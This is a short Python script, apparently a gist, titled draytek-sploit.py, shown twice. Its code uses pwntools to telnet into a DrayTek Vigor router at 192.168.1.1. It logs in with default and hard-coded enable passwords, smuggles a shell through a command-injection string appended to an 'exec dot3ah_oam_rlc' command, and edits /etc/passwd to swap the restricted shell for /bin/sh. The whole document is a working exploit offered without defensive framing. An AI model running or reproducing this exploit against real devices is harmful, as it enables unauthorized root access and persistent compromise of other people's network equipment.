q3k/draytek-sploit.py

## draytek-sploit.py
import pwn

r = pwn.remote('192.168.1.1', 23)
r.recvuntil('Username: ')
r.sendline('admin')
r.recvuntil('Password: ')
r.sendline('admin')

r.recvuntil('vigor> ')
r.sendline('en')
r.recvuntil('Password: ')
r.sendline('drayteker')

r.recvuntil('vigor# ')
r.sendline('exec dot3ah_oam_rlc DSL disable;sh>&2')

r.recvuntil('# ')
r.sendline("sed -i 's,/usr/bin/draysh,/bin/sh,' /etc/passwd")
r.recvuntil('# ')
	import pwn

	r = pwn.remote('192.168.1.1', 23)
	r.recvuntil('Username: ')
	r.sendline('admin')
	r.recvuntil('Password: ')
	r.sendline('admin')

	r.recvuntil('vigor> ')
	r.sendline('en')
	r.recvuntil('Password: ')
	r.sendline('drayteker')

	r.recvuntil('vigor# ')
	r.sendline('exec dot3ah_oam_rlc DSL disable;sh>&2')

	r.recvuntil('# ')
	r.sendline("sed -i 's,/usr/bin/draysh,/bin/sh,' /etc/passwd")
	r.recvuntil('# ')